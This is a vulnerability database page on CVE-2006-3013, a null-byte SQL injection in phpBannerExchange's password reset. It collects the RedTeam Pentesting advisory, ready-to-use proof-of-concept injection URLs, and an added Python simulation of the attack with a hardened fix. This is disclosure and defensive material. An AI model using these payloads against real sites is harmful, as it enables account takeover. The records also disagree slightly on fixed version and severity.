CVE-2006-3013
CVSS 5.1
Published: 2006-06-19 06:02:00
Revised: 2011-03-07 21:37:28

[Original] Interpretation conflict in resetpw.php in phpBannerExchange before 2.0 Update 6 allows remote attackers to execute arbitrary SQL commands via an email parameter containing a null (%00) character after a valid e-mail address, which passes the validation check in the eregi PHP command. NOTE: it could be argued that this vulnerability is due to a bug in the eregi PHP command and the proper fix should be in PHP; if so, then this should not be treated as a vulnerability in phpBannerExchange.


[CNNVD] phpBannerExchange resetpw.php SQL injection vulnerability (CNNVD-200606-348)

        resetpw.php in phpBannerExchange versions before 2.0 Update 6 contains an interpretation conflict. A remote attacker can execute arbitrary SQL commands via an email parameter that contains a null (%00) character after a valid e-mail address, which passes the validation check in the eregi PHP function. Note: it could be argued that this vulnerability is due to a bug in the eregi PHP function and that the proper fix belongs in PHP; if so, it should not be treated as a vulnerability in phpBannerExchange.

- CVSS (base score)

CVSS score: 5.1 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [performance degradation or interrupted access to resources is possible]
Access complexity: HIGH [exploitation requires specific access conditions]
Access vector: [--]
Authentication: NONE [no authentication is required to exploit]

- CPE (affected platforms and products)

cpe:/a:eschew.net:phpbannerexchange:2.0_update_3
cpe:/a:eschew.net:phpbannerexchange:2.0
cpe:/a:eschew.net:phpbannerexchange:2.0_update_2
cpe:/a:eschew.net:phpbannerexchange:2.0_update_1
cpe:/a:eschew.net:phpbannerexchange:2.0_update_4
cpe:/a:eschew.net:phpbannerexchange:2.0_update_5

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3013
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3013
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-348
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/18448
(PATCH)  BID  18448
http://www.securityfocus.com/archive/1/archive/1/437294/100/0/threaded
(PATCH)  BUGTRAQ  20060615 Advisory: Unauthorized password recovery in phpBannerExchange
http://www.eschew.net/scripts/phpbe/2.0/releasenotes.php
(VENDOR_ADVISORY)  CONFIRM  http://www.eschew.net/scripts/phpbe/2.0/releasenotes.php
http://secunia.com/advisories/20687
(VENDOR_ADVISORY)  SECUNIA  20687
http://www.vupen.com/english/advisories/2006/2358
(UNKNOWN)  VUPEN  ADV-2006-2358
http://www.redteam-pentesting.de/advisories/rt-sa-2006-005.txt
(UNKNOWN)  MISC  http://www.redteam-pentesting.de/advisories/rt-sa-2006-005.txt
http://xforce.iss.net/xforce/xfdb/27193
(UNKNOWN)  XF  phpbannerexchange-resetpw-info-disclosure(27193)
http://www.osvdb.org/26509
(UNKNOWN)  OSVDB  26509
http://lists.grok.org.uk/pipermail/full-disclosure/2006-June/046953.html
(UNKNOWN)  FULLDISC  20060615 Advisory: Unauthorized password recovery in phpBannerExchange

- Vulnerability information

phpBannerExchange resetpw.php SQL injection vulnerability
Medium severity  Input validation
Published: 2006-06-19 00:00:00  Updated: 2006-06-19 00:00:00
Remote
        resetpw.php in phpBannerExchange versions before 2.0 Update 6 contains an interpretation conflict. A remote attacker can execute arbitrary SQL commands via an email parameter that contains a null (%00) character after a valid e-mail address, which passes the validation check in the eregi PHP function. Note: it could be argued that this vulnerability is due to a bug in the eregi PHP function and that the proper fix belongs in PHP; if so, it should not be treated as a vulnerability in phpBannerExchange.

- Advisory and patch

        The vendor has released version 2.0 RC6 to address this issue (the advisory below lists 2.0 RC5 and earlier as affected); see the references section for details.
        http://www.eschew.net/scripts/download.php?id=12

- Vulnerability information (F47617)

rt-sa-2006-005.txt (PacketStormID:F47617)
2006-06-25 00:00:00
RedTeam Pentesting  redteam-pentesting.de
exploit,sql injection
CVE-2006-3013
[Download]

RedTeam has identified an SQL injection that can be triggered due to a lack of user input sanitization in phpBannerExchange versions 2.0 RC5 and below. It is possible to recover the password of a user and thereby take over the account.

Advisory: Unauthorized password recovery in phpBannerExchange

RedTeam identified an SQL injection that can be triggered due to
insufficient sanitization of user input in phpBannerExchange. It is
possible to recover the password of a user and thereby take over the
account.


Details
=======

Product: phpBannerExchange
Affected Versions: All versions up to phpBannerExchange 2.0 RC5
Fixed Versions: 2.0 RC6
Vulnerability Type: Bad user input sanitization, SQL injection
Security-Risk: medium
Vendor-URL: http://www.eschew.net/scripts/phpbe/2.0/
Vendor-Status: informed, fixed version released
Advisory-URL: http://www.redteam-pentesting.de/advisories/rt-sa-2006-005.txt
Advisory-Status: public
CVE: CVE-2006-3013
CVE-URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3013


Introduction
============

From the vendor's homepage:
phpBannerExchange is a PHP/mySQL script that allows virtually anyone
with minimal knowledge of PHP, mySQL and web hosting to run their own
banner exchange. 


More Details
============

If a user has forgotten the password of his phpBannerExchange account,
he can reset it by supplying his email address.
In "resetpw.php" the variable $email holds this email address, which
is then validated by a regular expression:

[...]
/* resetpw.php, line 42 */
if(!eregi("^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,3})$", $email)){
[...]

Due to a bug in the implementation of eregi(), additional characters
can be smuggled past this check by using a Null Byte "\0". Because the
backend of eregi() is implemented in C, $email is treated as a
zero-terminated string: nothing from the Null Byte onwards is seen by
the regular expression, so the prefix is validated and the remainder is
passed through untouched. Therefore an email address that includes the
special character "'" can be supplied to break the following SQL query:

[...]
/* resetpw.php, line 48 */
$get_info=mysql_query("select * from banneruser where email='$email'");
[...]

After that, a new password for the chosen user is generated and sent via

[...]
/* resetpw.php, line 68 */
mail($email,$usrsubject,$usrcontent,"From: $ownermail");
[...]

Note that mail() will treat $email as a zero-terminated string, too, so
the recipient is only the part before the Null Byte. As a result, an
attacker can reset the password of any user account and have it sent to
his own email address.


Proof of Concept
================

Use the following URLs with your favorite web browser:

http://example.com/phpbe/resetpw.php?submit=&email=attacker@example.com%00'or email='victim@example.com

to retrieve the password of the user with the email address
"victim@example.com" or

http://example.com/phpbe/resetpw.php?submit=&email=attacker@example.com%00'or id='1

to retrieve the password of the user with user id "1".
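The chain described above, run end to end as an added example (illustrative code written for this page, not code from phpBannerExchange or from the advisory): eregi() and mail() are modelled as C routines that stop at the first NUL, the banneruser table is a constructed in-memory SQLite table with two made-up accounts, and the function names reset_vulnerable, reset_hardened and run_like_ext_mysql are this example's own. One assumption is flagged in the code: Python's sqlite3 binding refuses NUL inside SQL text, so the demo renders the NUL as U+FFFD where ext/mysql sent the raw byte; the first literal still matches no account, and the injected OR clause does the work just as it did against MySQL. The hardened variant shows the two changes that close the hole on current PHP as well, where eregi() no longer exists and magic quotes are gone: a binary-safe, whole-string check that rejects NUL, and a bound parameter instead of string concatenation.

```python
"""Model of the resetpw.php NUL-byte validation bypass and a hardened form.

Added illustration, not code from phpBannerExchange or the advisory. The
database is an in-memory SQLite table constructed here; eregi() and mail()
are modelled as C-style consumers of NUL-terminated strings.
"""
import re
import sqlite3

# Pattern from resetpw.php line 42; eregi() matched case-insensitively.
EMAIL_RE = re.compile(
    r"^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,3})$",
    re.IGNORECASE,
)

# Constructed sample rows standing in for the banneruser table.
SAMPLE_USERS = [
    (1, "admin@example.com", "old-admin-password"),
    (2, "victim@example.com", "old-victim-password"),
]


def c_string(value: str) -> str:
    """What a C routine sees when handed a PHP string: up to the first NUL."""
    return value.split("\x00", 1)[0]


def eregi_model(value: str) -> bool:
    """eregi() on PHP < 7: the regex runs over the NUL-terminated view only."""
    return EMAIL_RE.match(c_string(value)) is not None


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("create table banneruser (id integer, email text, password text)")
    db.executemany("insert into banneruser values (?, ?, ?)", SAMPLE_USERS)
    return db


def build_query(email: str) -> str:
    """The string-built statement from resetpw.php line 48."""
    return f"select * from banneruser where email='{email}'"


def run_like_ext_mysql(db: sqlite3.Connection, query: str):
    """ext/mysql sent the whole buffer, NUL included, via mysql_real_query().
    Assumption for this demo: Python's sqlite3 binding rejects NUL inside SQL
    text, so the NUL is rendered as U+FFFD. The first literal still matches no
    account and the injected OR clause selects the row, as it did on MySQL."""
    return db.execute(query.replace("\x00", "\ufffd")).fetchone()


def reset_vulnerable(db: sqlite3.Connection, email: str):
    """Original flow: eregi() check, string-built query, mail() to $email."""
    if not eregi_model(email):
        return None
    row = run_like_ext_mysql(db, build_query(email))
    if row is None:
        return None
    # A fresh password would now be stored for row[0] and mailed to
    # whatever mail() sees, i.e. the part of $email before the NUL.
    return {"reset_account": row[1], "mailed_to": c_string(email)}


def reset_hardened(db: sqlite3.Connection, email: str):
    """Hardened flow: binary-safe whole-string validation, bound parameter."""
    # fullmatch avoids the trailing-newline leniency of "$"; the explicit NUL
    # check documents the intent even though the character classes exclude it.
    if "\x00" in email or EMAIL_RE.fullmatch(email) is None:
        return None
    row = db.execute(
        "select id, email from banneruser where email = ?", (email,)
    ).fetchone()
    if row is None:
        return None
    return {"reset_account": row[1], "mailed_to": email}


if __name__ == "__main__":
    db = make_db()
    payload = "attacker@example.com\x00'or email='victim@example.com"
    print("vulnerable:", reset_vulnerable(db, payload))  # victim reset, mailed to attacker
    print("hardened:  ", reset_hardened(db, payload))    # None: payload rejected
```

Running the block prints the victim's account being reset with the new password addressed to attacker@example.com under the original flow, and a rejection under the hardened one; the second advisory payload (the id='1' form) behaves the same way and lands on the constructed admin row.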


Workaround
==========

Use PHP Magic Quotes.


Fix
===

Upgrade to version 2.0 RC6


Security Risk
=============

The security risk is high because an attacker could gain access to an
administrator account, view and alter the database, and thereby
compromise the whole application.


History
=======

2006-06-09 Discovery of the problem
2006-06-10 Vendor is informed
2006-06-12 Vendor released fixed version

References
==========

[1] http://www.eschew.net/scripts/phpbe/2.0/


RedTeam
=======

RedTeam Pentesting offers individual penetration tests (pentests for
short) performed by a team of specialised IT-security experts. In this
way, security weaknesses in company networks are uncovered and can be
fixed immediately.

As there are only few experts in this field, RedTeam wants to share its
knowledge and enhance the public knowledge with research in security
related areas. The results are made available as public security
advisories.

More information about RedTeam can be found at
http://www.redteam-pentesting.de.

-- 
RedTeam Pentesting            Tel.: +49-(0)241-963 1300
Dennewartstr. 25-27           Fax : +49-(0)241-963 1304
52068 Aachen           http://www.redteam-pentesting.de
    

- Vulnerability information

26509
phpBannerExchange resetpw.php email Parameter SQL Injection
Remote / Network Access; Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- Vulnerability description

PhpBannerExchange contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the resetpw.php script not properly sanitizing user-supplied input to the 'email' parameter. This may allow an attacker to inject or manipulate SQL queries in the back-end database.

- Timeline

Disclosure: 2006-06-15  Discovery: 2006-06-09
Exploit published: 2006-06-15  Solution: Unknown

- Solution

Upgrade to version 2.0 RC6 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Vulnerability information

phpBannerExchange Multiple SQL Injection Vulnerabilities
Input Validation Error  18448
Remote: Yes  Local: No
Published: 2006-06-15 12:00:00  Updated: 2006-06-15 09:41:00
RedTeam Pentesting is credited with the discovery of these vulnerabilities.

- Affected versions

eschew.net phpBannerExchange 2.0 RC5
eschew.net phpBannerExchange 2.0

- Unaffected versions

eschew.net phpBannerExchange 2.0 RC6

- Discussion

phpBannerExchange is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.

- Exploitation

These issues can be exploited through a web client.

- Solution

The vendor has released version 2.0 RC6 to address these issues; please see the reference section for details.


eschew.net phpBannerExchange 2.0 RC5

eschew.net phpBannerExchange 2.0

About the SCAP Chinese Community

The SCAP Chinese Community is the first open Chinese-language community dedicated to SCAP. For more information, see [About this site].

Copyright notice

CVE, CWE and OVAL are registered trademarks of the MITRE Corporation; their official data sources are maintained on MITRE's websites.